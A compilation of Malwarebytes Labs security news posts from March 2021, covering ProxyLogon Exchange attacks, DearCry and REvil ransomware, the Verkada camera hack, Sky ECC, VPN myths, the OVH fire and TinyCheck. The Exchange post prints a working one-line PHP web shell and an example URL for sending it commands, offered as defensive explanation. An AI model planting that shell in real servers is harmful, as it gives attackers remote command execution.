IT News

This week on Lock and Code, we discuss the top security headlines generated right here on Labs. In addition, we tune in to a special presentation from Adam Kujawa about the 2021 State of Malware report, which analyzed the top cybercrime goals of 2020 amidst the global pandemic.

If you just pay attention to the numbers from last year, you might get the wrong idea. After all, malware detections for both consumers and businesses decreased in 2020 compared to 2019. That sounds like good news, but it wasn’t. Behind those lowered numbers were more skillful, more precise attacks that derailed major corporations, hospitals, and schools with record-setting ransom demands.

Tune in to hear about how cybercrime has changed, along with examples of some of the most nefarious malware upgrades, on the latest episode of Lock and Code, with host David Ruiz.

https://feed.podbean.com/lockandcode/feed.xml

You can also find us on the Apple iTunes store, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

We cover our own research on:

• Microsoft Exchange attacks cause panic as criminals go shell collecting
• TinyCheck: Stalkerware detection that doesn’t leave a trace
• 5 common VPN myths
• REvil ransomware’s calling, and it’s not good news
• OVH cloud datacenter destroyed by fire
• iPhone app exposed other people’s call recordings
• Police credit “unlocked” SKY ECC encryption for organized crime bust

Other cybersecurity news

• Spanish government falls prey to Ryuk ransomware. (Source: The Record)
• FIN8, a threat group who has been inactive for a couple of years, returns with a new malware and a new target: the hospitality sector. (Source: ZDNet)
• PSA: Russia, China will likely use deepfakes in the coming weeks (Source: Cyberscoop)
• TikTok account of popular Korean band, BTS (Burn The Stage), was hacked. (Source: InfoSecurity Magazine)
• Russia is attempting to beat rival COVID-19 vaccine companies via disinformation campaigns (Source: Endgadget)

Stay safe!

The post The Malwarebytes 2021 State of Malware report: Lock and Code S02E04 appeared first on Malwarebytes Labs.

Hackers were able to gain access to camera feeds from Verkada, a tech company that specializes in video security and physical access control, to demonstrate how prevalent surveillance is, reports say.

Unfortunately, it also exposed the inner workings of hospitals, clinics, and mental health institutions; banks; police departments; prisons; schools; and companies like Tesla and Cloudflare, after at least 150,000 cameras were compromised as part of this demonstration.

Verkada is still investigating the scale and scope of the breach.

The attack

Swiss hacker and member of the hacking collective “APT-69420 Arson Cats,” Tillie Kottmann, claimed credit for the Verkada hack. When asked why, they told Bloomberg: “lots of curiosity, fighting for freedom of information and against intellectual property, a huge dose of anti-capitalism, a hint of anarchism—and it’s also just too much fun not to do it.”

Kottmann was also credited for breaching Intel in August 2020 and Nissan Motors in January 2021.

All of Kottmann’s tweets related to the Verkada hack contain the #OperationPanopticon hashtag, which references the panopticon, a prison architecture that allows a supervisor to have full view of its inmates without them knowing that they’re being watched. It is also a metaphor used to illustrate surveillance technology.

It isn’t clear if this operation is a name for just the Verkada hack, or a name for a series of breaches against surveillance companies that could affect millions, with Verkada just the first company to be targeted and breached.

Speaking to Bloomberg, Kottmann said this incident “exposes just how broadly we’re being surveilled, and how little care is put into at least securing the platforms used to do so, pursuing nothing but profit. It’s just wild how I can just see the things we always knew are happening, but we never got to see.”

Twitter suspended Kottmann’s account after they leaked Tesla security footage.

When asked how they were able to breach Verkada, Kottmann claimed that they were able to get an administrator account credential, which was publicly available online for some reason, with “super admin” rights, which gave them access to any camera, belonging to any of the company’s clients.

IPVM reports that a source “with direct knowledge” discovered that “basically every team member” at Verkada, including executives, had super-admin privileges.

IPVM also reports that super-admin access went further than simply letting the hackers see whatever they wanted:

Not only did Super Admin provide access to video feeds … it provided access to the root shell inside the cameras running inside each customer’s facility.

The response

In a statement about the incident, Verkada confirmed IPVM’s reporting, admitting that attackers had “gained access to a tool that allowed the execution of shell commands on a subset of customer cameras”.

According to the company, attackers gained access via a Jenkins server “used by our support team to perform bulk maintenance operations on customer cameras”, which gave them access to “video and image data from a limited number of cameras from a subset of client organizations”. Attackers also gained access to lists of client account administrators and sales orders.

Seeking to reassure customers, the company said it had now secured its systems.

First, we have identified the attack vector used in this incident, and we are confident that all customer systems were secured as of approximately noon PST on March 9, 2021. If you are a Verkada customer, no action is required on your part.

This isn’t Verkada’s first bout with negative publicity. In October 2020, three employees were fired after they abused Verkada’s own video surveillance system to capture and pass on media of female colleagues with sexually explicit jokes in one of the company’s Slack rooms.

Motherboard’s Vice was able to interview a Verkada employee who was unimpressed by the whole incident, saying “the big picture for me having worked at the company is that it has opened my eyes to how surveillance can be abused by people in power.”

The fallout

The hack raises serious questions about who had access to what, and why, and highlights both the security and privacy risks that come with admin and super-admin accounts. Simply, the more administrators there are, the more targets there are.

Administrator or super-administrator accounts should only be issued to people who need them to do their job, and those people should only use them if an account with lower privileges can’t be used. They should never be used for convenience.

Speaking to Bloomberg about the consent and privacy implications, Eva Galperin, the Electronic Frontier Foundation’s director of cybersecurity, made the point that companies who use a network of cameras may not expect that someone other than the company’s security team are watching them.

“There are many legitimate reasons to have surveillance inside of a company,” Galperin said in a Bloomberg interview. “The most important part is to have the informed consent of your employees.”

Finally, it should not be forgotten that Verkada and its customers were the victims of a crime. Accessing other people’s computers without their consent is still illegal, no matter how good your point is.

The post 150,000 Verkada security cameras hacked—to make a point appeared first on Malwarebytes Labs.

The Microsoft Exchange attacks using the ProxyLogon vulnerability, and previously associated with the dropping of malicious web shells, are taking on a ransomware twist. Until now, the name of the game has been compromise and data exfiltration, with a bit of cryptomining on the side.

To summarise: In ten days we’ve gone from “limited and targeted attacks” by a nation-state actor, to countless attacks by a number of groups against anyone with a vulnerable server. And in the space of a week the severity has escalated from unused web shells to ransomware. Depending on how the uptake in patching goes, this could well evolve again.

The danger of this pivot to ransomware is the sheer number of potential targets. Needless to say, it is essential that you install the Exchange updates required to keep your systems safe from harm.

The scale of the problem

Internet intelligence group Shadowserver has attempted to quantify the problem of exposed Exchange servers by scanning the Internet looking for vulnerable machines.

It has made two startling conclusions. The first is that as many as 68,500 servers may have been compromised by the so-called Hafnium threat actor before Microsoft released patches for its Exchange zero-days.

The total dataset distributed includes over 68500 distinct IP addresses. Of these IP addresses, there is high certainty that 8911 IP addresses were compromised. However, the remaining IP addresses included in the report are also very likely compromised too, since they were targeted with the OWA 0-day exploit before Microsoft publicly released patches for Exchange.

The groups second insight, is that at the time of its most recent scan, three days ago, 64,088 unique IP addresses were assessed as “still having exposed Microsoft Exchange Server vulnerabilities“. According to the group, the USA has by far the largest population of vulnerable servers, with almost 17,500.

The group’s research partner, the Dutch Institute for Vulnerability Disclosure, reported separately that nearly 20% of the 250,000 servers it scanned were vulnerable.

Which ever way you slice it, there are still a lot of vulnerable Exchange servers out there, and history suggests it will take a considerable time to patch them all.

With that out of the way: what, exactly, is the ransomware angle to this latest round of ProxyLogon attacks?

Introducing DearCry ransomware

Bad actors are now using Exchange exploits to gain entry to networks, before manually running DearCry ransomware.

This is an indicator of how easy Exchange exploitation is becoming. For years, targeted ransomware attacks have been synonymous with brute-force attacks on RDP ports. It’s such a common tactic, it’s easy to forget that criminals were simply using the easiest method of entry available.

The ransomware, first reported by BleepingComputer, has been dubbed “DearCry”. This is because it uses “DEARCRY!” as a file marker inside every encrypted file.

Malwarebytes and Microsoft have both independently confirmed that ProxyLogon is the entry vector for DearCry.

At the time of writing, it seems there is no way to decrypt the files without payment. As ever, prevention is better than cure, but if you are attacked successfully you’ll wish you’d secured your off-site backups and put a disaster recovery plan in place.

Once encryption takes place, the inevitable ransom note is deployed.

With backups and plans to restore them in place, victims can choose to ignore the attackers and carry on as normal. However, it is possible copies of the compromised files remain in the hands of the ransomware authors. This is how you get leaks further down the line.

According to the Bleeping Computer, a demand for $16,000 was made to one victim for the safe decryption of their files. There isn’t enough information available at this stage to determine if $16,000 is the going rate for DearCry attacks, or if there’s some variance to the amounts requested.

What’s certain is that other ransomware gangs will happily charge vastly greater sums, and if Exchange exploitation proves easier than RDP access, they will use it.

It’s time to update

If you haven’t already patched your systems, please do so right away and search your systems for signs of compromise.

Malwarebytes detects web shells planted on comprised Exchange servers as Backdoor.Hafnium. When the ransomware was still unknown, DearCry attacks would have been detected proactively as Malware.Ransom.Agent.Generic.

We’ll update the timeline in our first article on this topic as more developments and fresh information comes to light.

The post Ransomware is targeting vulnerable Microsoft Exchange servers appeared first on Malwarebytes Labs.

At the moment, I’m really torn, and I need your help. Let me tell you what is going on. I read these statements and they can’t both be true, right?

“The continuous monitoring of the illegal Sky ECC communication service tool by investigators in three countries has provided invaluable insights into hundreds of millions of messages exchanged between criminals.”

“SKY ECC platform remains secure and no authorized Sky ECC device has been hacked.”

I’ll give you some more background and then you can help me decide.

Arrests made

It was reported today that Belgian police invaded 200 locations and arrested 48 people (this was a big headline in Belgium). Two of those people are suspected of being corrupt cops in the Antwerp police force. The police stated they were able to make these arrests because they were able to intercept and read messages on encrypted phones provided by SKY ECC.

Europol claims “invaluable insights”

Europol released a statement about the background of these actions, which started:

Judicial and law enforcement authorities in Belgium, France and the Netherlands have in close cooperation enabled major interventions to block the further use of encrypted communications by large-scale organised crime groups (OCGs), with the support of Europol and Eurojust. The continuous monitoring of the illegal Sky ECC communication service tool by investigators in the three countries involved has provided invaluable insights into hundreds of millions of messages exchanged between criminals. 

It went on to describe the operations as “an essential part of the continuous effort of judiciary and law enforcement in the EU and third countries to disrupt the illegal use of encrypted communications”.

SKY ECC says it “remains secure”

Sky ECC advertises itself as “most secure messaging platform you can buy”, and has around 170,000 users worldwide.

In response to the articles published in the Dutch and Belgian press, SKY ECC let the public know that all allegations that Belgian and/or Dutch authorities have cracked or hacked SKY ECC encrypted communication software are false, stating:

SKY ECC is built on “zero-trust” security principles which assumes every request as a breach and verifies it by employing layers of security to protect its users’ messages. All SKY ECC communications are encrypted through private tunnels via private distributed networks. All messages are encrypted with today’s highest level of encryption.

Unlocked encryption

Are you still with me? Now, if we think hard, there are some scenarios where both statements could be true. Maybe the police are talking about analysing unencrypted meta data, or had access to a limited number of decryption keys. Or maybe they had someone on the inside feeding them information. But those go out of the window when we read the Europol statement and find the sentence “By successfully unlocking the encryption of Sky ECC…”

Who can you trust?

“Who do we trust?” is an important question in many security and privacy related matters. It may be the way I was raised, but I tend to trust the police in these matters, even if not every police force is equipped to deal with modern cybercrimes.

Of course, there is a chance that whoever drafted the Europol statement made an error, or that “unlocking the encryption” is a deliberate red herring to protect another source. But I cannot overlook that Europol and Eurojust (European Union Agency for Criminal Justice Cooperation) happen to have an excellent track record in this field.

SKY ECC on the other hand has every reason to deny it has been breached. Proof that it has could prove to be destructive for a company whose customers are invested in trusting its equipment and services.

A third possibility

There is a third possibility too, raised in the SKY ECC statement. In it, the company says (my emphasis) “distributors in Belgium and the Netherlands brought to our attention that a fake phishing application falsely branded as SKY ECC was illegally created, modified and side-loaded onto unsecure devices, and security features of authorized SKY ECC phones were eliminated in these bogus devices which were then sold through unauthorized channels.”

If the police hacked, or even created, an insecure imposter device they can monitor—one that fools potential criminals into believing they have the real thing—then it is possible for both sides to be telling at least a partial truth.

Is the proof in the pudding?

Arrests in these countries are not made lightly, so the police force must have had some information to go on. And the sheer number of arrests made leads us to believe that this was not the result of the police having access to one device (one server may be a more likely option, or many fake devices).

As you can tell, I seem to have made up my mind along the way. But we appreciate your thoughts on the matter.

If any side decides to reveal more information, we will keep you updated.

Stay safe, everyone!

The post Police credit “unlocked” SKY ECC encryption for organized crime bust appeared first on Malwarebytes Labs.

Virtual Private Networks (VPNs) are popular but often misunderstood. There are many misconceptions about them—misconceptions that may be stopping people from adding a useful layer to their security and privacy defenses.

So, let’s do some myth busting.

1. VPNs are for illegal activity

Some people think that VPNs are only useful for doing things like torrenting, accessing geo-locked content, or getting around work/school/government firewalls. While they certainly are used for those activities, that doesn’t mean that’s all they’re good for or that everyone who uses a VPN is planning to do something illegal or immoral with it.

As awareness of corporate surveillance and criminal hacking has grown, so have concerns about personal privacy. Many people believe that it should be their choice when and how they give up some of their privacy, and don’t want prying eyes on their normal, legitimate behavior. A VPN gives them more control over what they share and with who, and a little less  to worry about.

2. I don’t need a mobile VPN

Some people think they don’t need a mobile VPN because their carrier looks after their security, or has a lot to say about privacy.

While it is true that carriers and ISPs have a secure telecom infrastructure because they are bound by law to do so, many ISPs have shown they are also very interested in tracking their subscribers and profiting off their data. Even though it feels like you’re protected behind that special IP address that is automatically assigned to you by the ISP when you take up the service, your ISP can, themselves, see exactly:

• When you log on and off
• The websites you visit
• How much time you spend on those sites.
• and more… depending on your habits and the apps you use

Using a VPN shifts your trust from your ISP to your VPN provider, so you can choose to use your carrier’s secure telecom infrastructure without giving your carrier access to your browsing data.

3. VPNs will slow down my internet connection

Since a VPN sends your network traffic on a bit of detour it has to travel further than it would without a VPN. Technically that means your traffic is slower, but that doesn’t necessary mean it has to be noticeably slower. Most VPN providers offer you the choice to choose a server near you, which makes the detour smaller.

Also, encrypting and decrypting data takes time. However, there is a benefit to using a next-gen VPN with modern encryption compared to older VPNs. The technology has improved over the years and VPNs have become faster and more efficient.

4. My VPN won’t let me watch Netflix

Many streaming sites and apps don’t like it when you use a VPN to watch their content and some just outright ban it (because they have an obligation to lock certain content based on region), which leaves some people believing they have to choose between privacy or entertainment.

Now, if getting around locked content is not your main purpose for using a VPN, simply look for one that offers a bypass feature, otherwise known as a split tunnel. This basically tells your VPN that certain apps get a pass and can connect without being encrypted, thus “splitting” the tunnel into TWO–one that is private and one that is not.

So, you can have your banking app running, shielded by your VPN, and watch Netflix.

5. VPNs are for geeks and power users

While this may have been true in the past, VPNs have become easier to use over the years. With the introduction of paid VPNs, vendors have taken it upon themselves to lower prices and improve quality, and to make their products easier to use.

You should expect a straightforward installation process and intuitive functionality that makes using a VPN just as easy as checking your mail or browsing social media (safely).

Stay safe, everyone!

The post 5 common VPN myths busted appeared first on Malwarebytes Labs.

A fire in one of the OVH datacenters has destroyed one datacenter and knocked two others offline. It took 100 firefighters and 43 fire trucks to fight the fire in the five-story building. Even though the fire department was quick to respond, and the fire was brought under control relatively quickly, the impact has been big.

In a press statement OVH promised “to communicate as transparently as possible on the progress of our analyses and the implementation of solutions”.

OVH is the largest hosting provider in Europe and the third largest in the world. The cloud computing company provides virtual private servers, dedicated servers, and other web services.

Customers are being advised by the company to enact their disaster recovery plans after the fire has rendered multiple data centres unserviceable, impacting websites around the world, and a number of organisations involved in cybersecurity.

One such company, Acceis, met the situation with an admirable sense of humour, while providing a dramatic view of the fire.

Data and servers in the cloud

Many organizations use some type of cloud services to keep their setup flexible. But the old saying about the cloud that “it’s your data on someone else’s computer” hits home when you suddenly loose a big chunk of your server capacity or your web services out of the blue.

It’s too late to think about a backup plan when you find yourself needing one. As a result of this incident some customers of OVH state their web services are inaccessible. Which usually means that their websites are inaccessible as well.

Sadly, for video game maker Rust, the incident has led to a total data loss, leaving no way for recovery (although the company seems to be restoring services fairly rapidly).

BleepingComputer provided this list of victims:

“The list of impacted clients includes cyber threat intelligence company Bad Packets, provider of free chess server Lichess.org, videogame maker Rust, cryptocurrency exchange Deribit’s blog and docs sites, telecom company AFR-IX, encryption utility VeraCrypt, news outlet eeNews Europe, the art building complex Centre Pompidou, and many others.”

And since the data centre site is off limits for now, it will take a while before the offline centres can be restarted.

OVH’s Octave Klaba tweeted:

“We plan to restart SBG1+SBG4+the network by Monday March,15 and SBG3 by Friday March,19.”

Pros and cons of the cloud

The fire is a very dramatic reminder that the cloud has a down side. As with all technology, there are pros and cons to using it.

The great advantages of the cloud are that it makes worrying about hardware somebody else’s problem, its scalable and flexible—it can react quickly to changes in demand and you pay for what you use—and it’s accessible from anywhere.

But even in the cloud your data is always somewhere, and that somewhere still needs security (which may be different from what you’re used to), data protection, internet access, backups and disaster recovery.

As OVH put it:

Customers should immediately bring into effect their disaster recovery plans as OVH is working on restoring its services.

That raises the question of how many of its customers had such a disaster recovery plan. It’s too late for them if they didn’t, but if you weren’t affected by this fire, now is the perfect time to check that you have one!

The post OVH cloud datacenter destroyed by fire appeared first on Malwarebytes Labs.

Video and audio are huge privacy concerns for people. If something goes wrong with tech it can have major ramifications. You’re likely very familiar with warnings about video. However, audio hasn’t always been so prominent. It’s only really since the rise of home assistants like Amazon’s Alexa that audio worries have gone mainstream.

Turning up the volume on audio threats

Bluetooth earphones and similar devices have only helped to raise awareness of potential issues, as we consider the tools we use the most. As per the link, it’s generally a lot harder to secure sound than vision. There isn’t an audio equivalent of the bit of tape over your webcam. You’re dealing with the innards of your device and that’s not for everyone. Either the hardware tinkering is beyond them, or their audio setup is a confusing mess of six audio devices and brand-specific audio controls.

It isn’t easy, and that’s just for desktop. Mobile is another proposition altogether, being an incredibly personal device yet something of a mystery-box to many owners. How does your Android phone work? Which version of Android is it even? How do the basic settings differ on your phone from mine? You’re giving me an iPhone for work? Sorry, I’ve never used one of those before.

These are just a sample selection of the things you’ll run into if you’ve ever been nominated your household’s Christmas season tech support. Worse, a lot of what seems to happen on a phone actually happens in the cloud (such as interpreting voice commands), where it’s completely beyond your reach.

Which brings us neatly to a recent discovery.

Listening in to someone else’s recordings

Researchers found an issue with an iPhone call recording app, which boasts of “more than 1,000,000 downloads”. Used to record and share clips via email, or saved to storage solutions such as Dropbox and Google Drive, it offers a fair bit of flexibility for people in need of some audio recording.

The researcher who discovered the vulnerability used various security testing tools to view and modify network traffic used by the app. From there, they discovered it was possible to replace their own phone number with someone else’s. With that done, recordings from that phone (located in the cloud, on an Amazon AWS bucket) were available to them, without a password. The entire call history and the numbers calls were made on were also available, at least until the app was updated and the problem fixed by the developers.

Or, as the researchers at PingSafe put it:

The vulnerability allowed any malicious actor to listen to any user’s call recording from the cloud storage bucket of the application and an unauthenticated API endpoint which leaked the cloud storage URL of the victim’s data

Considering the kind of recordings people could make, this is a worrying thing to have happened. Think of all the business sensitive conversations people might have, or personal discussions, random thoughts, or anything else. Yes, we can argue people shouldn’t upload mission critical work conversations into the cloud (or even a laundry list of complaints about their neighbour). However, if you give people a recording app then record they will.

The perils of audio data in the cloud

TechCrunch reports there were 130,000+ audio recordings, weighing in at some 300GB in size, in the storage bucket. That’s a lot of potential for mischief, pranks, trolling, or just plain old blackmail and extortion. If we’re lucky, the only person who noticed this was the researcher who reported it.

Audio has always been a source for security and privacy concerns. Whether we’re talking fake Twitch audio fixes or where people’s data ends up, it’s always worth keeping in mind.

It might not be as visible a concern as the usual security hot-spots on your laptops and mobile devices, or as obvious as video. All the same, it’s an important part of your overall security hygiene.

This is probably an excellent moment to check:

• if your audio software need updating
• your streaming accounts are secure
• you’re happy with any audio files kept in the cloud

Follow these steps and hopefully your audio security will soon catch up with your visual-based best practices.

The post iPhone app exposed other people’s call recordings appeared first on Malwarebytes Labs.

Only last week we posted a blog about multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. Seeing how this disclosure came with a patch being available, under normal circumstances you would see some companies update quickly and others would dally until it bubbled up to the top of their to-do list.

This attack method, called ProxyLogon and attributed to a group called Hafnium, was different. It went from “limited and targeted attacks” to a full-size panic in no time. Attackers are using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.

How did this situation evolve? A timeline

To demonstrate how this situation came about we want to show you this timeline of developments:

• December 2020, CVE-2021-26855 is discovered by DEVCORE, who named the vulnerability ProxyLogon.
• January 2021, DEVCORE send an advisory and exploit to Microsoft through the MSRC portal.
• January 2021, Volexity and Dubex start to see exploitation of Exchange vulnerabilities.
• January 27, 2021, Dubex shares its findings with Microsoft.
• February 2, 2021, Volexity informs Microsoft of its findings.
• March 2, 2021, Microsoft publishes a patch and advisory, which has been updated a few times since then.
• March 4, 2021, The Cybersecurity and Infrastructure Security Agency issues an emergency directive after CISA partners observe active exploitation of vulnerabilities in Microsoft Exchange on-premises products.
• March 5, 2021, Microsoft and many security vendors see increased use of these vulnerabilities in attacks targeting unpatched systems, by multiple malicious actors, not just Hafnium.
• March 8, 2021, CISA issues a warning that it is aware of widespread domestic and international exploitation of these vulnerabilities.

The attacks went from a limited Advanced Persistent Threat (APT) used against targeted victims to cryptomining operations run by “common” cybercriminals in no time flat.

What often happens after vulnerabilities get disclosed and patched is that criminals reverse engineer the fix to create their own copycat exploits, so they can attack while systems are unpatched. Sometimes it takes a lot of skills and perseverance to get a vulnerability to work for you, but looking at the rapid introduction of these Exchange exploits into the threat landscape, this one looks like a piece of cake.

Victims

As of 8 March, Malwarebytes had detected malicious web shells on close to 1,000 unique machines already. Although most of the recorded attacks have occurred in the United States, organizations in other countries are under attack as well.

Chris Krebs, the former director of CISA, reckons government agencies and small businesses will be more affected by these attacks than large enterprises. Enterprises tend to use different software than on-premises Exchange Servers.

But Brian Krebs, in a post on his site, states that the Hafnium hackers have accelerated attacks on vulnerable Exchange servers since Microsoft released the patches. His sources told him that 30,000 organizations in the US have been hacked as part of this campaign.

Web shells

A web shell is as a malicious script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)

Web shells don’t attack or exploit a remote vulnerability, they are always the second step of an attack. Even if it opens the door to further exploitation, a web shell itself is always dropped after an initial exploitation.

Web shell scripts can be written in any of the programming languages designed for use on the web. You will find PHP, ASP, Perl, and many others. Attackers who successfully use web shells take advantage of the fact that many organizations do not have complete visibility into the HTTP sessions on their servers. And most web shells are basically non-executable files, which can make it hard for traditional antivirus software to detect them. The tiniest web shell in PHP on record is only this big:

<?=`$_GET[1]`?>

A shell like this will simply execute whatever command an attacker sends to the compromised server. They run it by calling the script in their browser, or from a command line HTTP client. For example, the following url would cause a tiny web shell running on example.com to execute whatever we put replaced {command} with:

www.example.com/index.html?1={command}

As you can see the use of this type of backdoor is easy. Once you have planted the web shell, you can use it to create additional web shells or steal information from the server.

What can we do?

Patch as soon as you can.

Microsoft’s team has published a script on GitHub that can check the security status of Exchange servers. The script has been updated to include indicators of compromise (IOCs) linked to the four zero-day vulnerabilities found in Microsoft Exchange Server.

It was important to patch last week, when it was just targeted attacks, but it’s all the more urgent now that it’s wild west out there. If you can’t patch your Exchange server, block internet access to it, or restrict access to it by blocking untrusted connections, or putting the server behind your VPN.

Scan your server for the presence of malicious web shells. Security vendors have added detection for the publicly posted IOCs and some will detect other malicious web shells as well.

Malwarebytes’ generic detection name for malicious web shells is Backdoor.WebShell and the detection name for the web shells that are tied directly to the Hafnium group is Backdoor.Hafnium.

Stay safe, everyone!

The post Microsoft Exchange attacks cause panic as criminals go shell collecting appeared first on Malwarebytes Labs.

In 2019, when Malwarebytes helped found the Coalition Against Stalkerware, which brings together cybersecurity vendors and nonprofits to detect and raise awareness about stalkerware, we encountered a significant roadblock in our fight: For some users, the very detection of these potentially privacy-invasive tools could put their lives at greater risk.

In short, we needed a way to detect stalkerware-type apps without the detection being discoverable by stalkerware-type apps or their users.

Now, a new tool makes that far more possible.

Developed by a small team at Kaspersky, “TinyCheck” represents the latest technological effort from a Coalition Against Stalkerware member to continue the fight against a digital threat that can rob people of their expectation of, and right to, privacy. It is just one of the many advancements from the Coalition Against Stalkerware, which meets routinely to discuss ongoing research, new member applications, regional outreach, and advances in detections.

What is TinyCheck?

TinyCheck is an open-source tool available on GitHub that requires a higher technical skillset than downloading and running any of the apps made by the Coalition Against Stalkerware’s cybersecurity vendors. Those apps, like Malwarebytes for Android, are installed directly on a device where they can perform malware scans to detect and remove suspicious or dangerous programs.

TinyCheck, on the other hand, runs separate from a smartphone, on a computer like a Raspberry Pi. Functionally, TinyCheck is configured to act as a WiFi access point. Once set up and connected to a smartphone, TinyCheck will analyze that smartphone’s Internet traffic and determine if it is sending data to a known, malicious server.

Kristina Shingareva, head of external relations for Kaspersky, said that TinyCheck “was built with the idea of making it impossible to identify its use via a stalkerware app.”

“The analysis of the checked device is only available to the individual person using TinyCheck with their own equipment,” Shingareva said. “It is not shared anywhere: neither Kaspersky nor any other party will receive this data.”

Further, Shingareva said that TinyCheck analyses are performed locally, and the data from those analyses, including full packet capture, logs, and a PDF report, can only end up on a USB stick that users can plug in to save records, or on a computer, if TinyCheck is running in a browser from a remote workstation.

This may sound like a lot of technical fuss for the everyday user, but the value is tremendous. When used correctly, TinyCheck can overcome what we are calling the “stalkerware detection dilemma.”

The stalkerware detection dilemma

For years, the detection of stalkerware-type apps followed the same model: If a user thought they had a malicious app on their phone, they downloaded a separate, anti-malware app to find that malicious app and then potentially root it out.

This makes sense, as early stalkerware detection fell somewhat haphazardly to the individual cybersecurity vendors that were already protecting people’s computers from other cyberthreats, such as malware, ransomware, and Trojans.

But as effective as that cyberthreat detection model is, it makes a lot of assumptions about its users. First, it assumes that users have full agency of their computers and devices, able to download a separate program on their own, and then run that program with little interference. Second, it assumes that the removal of a cyberthreat is the best way to keep a user safe.

In reality, those assumptions could be dangerous when dealing with stalkerware.

As we have written about on Malwarebytes Labs, there is a documented intersection between stalkerware use and domestic abuse. Domestic abusers have repeatedly used these tools to invade the privacy of their partners’ lives, prying into their text messages and emails, revealing their web browsing history, pinpointing their GPS location, and secretly recording their phone calls.

For many domestic abusers, stalkerware can serve as a digital method to maintain control of their partner’s life. For the survivor, then, the removal of a stalkerware-type app can actually cause more harm, cutting off their abuser’s control and only enraging them. Further, many domestic abuse survivors simply do not have sufficient device control to download and run an anti-malware application on their phone. Their phones may be shared with their abusers, or their phone’s passcode may be required to be shared, or their abuser may not even allow them to have a passcode on their phone at all.

Finally, some stalkerware-type apps can also see a device’s most recently installed app, the device’s screen when active, and the notifications delivered to the device, which could in turn reveal that a survivor downloaded an anti-malware scanner, used the scanner, and then received a notification about a stalkerware-type app present on the device.

Here, then, is the stalkerware detection dilemma: How can we safely detect these threats when the detections themselves could lead to more harm?

It is a question that many members of the Coalition Against Stalkerware have asked, and shortly after the Coalition welcomed Centre Hubertine Auclert as an associate partner, the French organization began working with Kaspersky to find a solution. Inspired by the opportunity, Kaspersky researcher Félix Aimé charged ahead, eventually releasing the first version of TinyCheck last year.

It has since gained new features and seen promising adoption.

Big impact

Though TinyCheck has a higher technical bar for use, it can help address an important gap.

According to Shingareva, Kaspersky relied on several of its experts to run a workshop in January that invited individuals from 15 French associations working to prevent and protect people from domestic abuse. Shingareva said that the company is also supporting TinyCheck in Australia, where it will launch a pilot phase of testing with the network committed to women’s domestic and family violence services, WESNET.

So far, TinyCheck has also been “starred” by more than 1,700 users on GitHub, and the introductory video to TinyCheck on YouTube has obtained more than 4,600 views.

Recently, Kaspersky’s developers updated TinyCheck to be able to send notifications to users when new updates are available. The company is also adding new languages to the user interface, with current functionality available in English, French, Spanish, and Catalan.

Shingareva said it is important that advocate networks and non-governmental organizations committed to protecting survivors of domestic abuse are heavily involved in the further development of TinyCheck. With yet another tool to help fight against stalkerware threats, we are hopeful for the future.

The post TinyCheck: Stalkerware detection that doesn’t leave a trace appeared first on Malwarebytes Labs.

The REvil ransomware (AKA Sodinokibi, which operates as a Ransomware as a Service) is adopting some outreach techniques after initial compromise, designed to shame victims into paying up.

Shaming victims into action

Malware authors and social engineers have relied on shame and the threat of exposure for years. Nothing encourages potential victims to pay up like a solid threat. This isn’t something to underestimate or dismiss. It can have very serious consequences, with at least one tragedy involving a suicide linked to common-or-garden ransomware threats. 

These threats are most closely linked to people at home, with sextortion being one of the biggest.

This is where victims are told someone has footage of them watching pornographic material, or engaging in sexual activity. If they don’t pay the Bitcoin ransom, scammers will release the footage to the world at large or even to just friends and family. This threat comes from old passwords taken from password dumps—which have probably long since changed—which could lend some believed credibility to the threat. The Ransomware authors have no footage whatsoever, but it’s a very effective tactic.

From consumer to corporate…

In recent developments, ransomware bought itself a business suit and a nice tie, and it started working its way into corporate. Here, the gimmick was compromising the network, locking up important files and/or servers and demanding cash to release them back to victims.

This quickly became a mess of arguments over paying the ransom, and the world of cyber insurance and whether it would actually insure against these types of attacks. It also led into the concept of ransomware authors ruining their own trust model with broken unlocks or missing decryption keys.

This time it’s personal

Whereas typical ransomware attacks involve encryption of all available files. More recently, attackers have added data exfiltration to their box of tricks, along with threats to leak the stolen data if victims are able to recover from the encryption with the attacker’s help.

A well-worn security notion is that we never know the full story in terms of numbers compromised by attack X or Y. This seems a reasonable assumption; lots of consumer and business victims of cybercrime do not want to publicize it. There may be liability issues they’re trying to keep hidden, or perhaps they don’t want the embarrassment of everyone knowing what happened.

This latest development twists the exfiltration knife a bit harder by using a splash of shame to encourage victims to pay up.

The scammers perform outreach to the media and the victim’s clients. The idea here is to keep heaping pressure on the victims until they relent and pay up. VoIP calls seem to be the method of choice for said outreach, which helps keep callers anonymized.

As noted by Bleeping Computer, similar tactics have been used in the past, but those calls focused on the victims. Threatening to expose a compromised machine or network via journalists or business affiliates is upping the stakes quite a bit.

As with ransomware attacks where there is no guarantee of being given a decryption key after payment, so too is there no guarantee the attackers will play nice afterwards. Regardless of tactics used, the end results are always the same: pay up, or else.

Putting scammers on the do-not-call list

Options may be limited depending on how prepared victims are at the start of a ransomware attack. It may well be that files are unrecoverable, or business operations cease while cleanup takes place.

It could be a huge payout is handed to the attackers, and no files are returned. They may get lucky, with all services restored and no mention outside the four walls of the business affected. It’s simply a lottery, though having said that, there’s a few ways you can even the odds. Stay safe out there, and hopefully you’ll never have to hear a ransomware fan at the other end of a telephone line.

The post REvil ransomware’s calling, and it’s not good news appeared first on Malwarebytes Labs.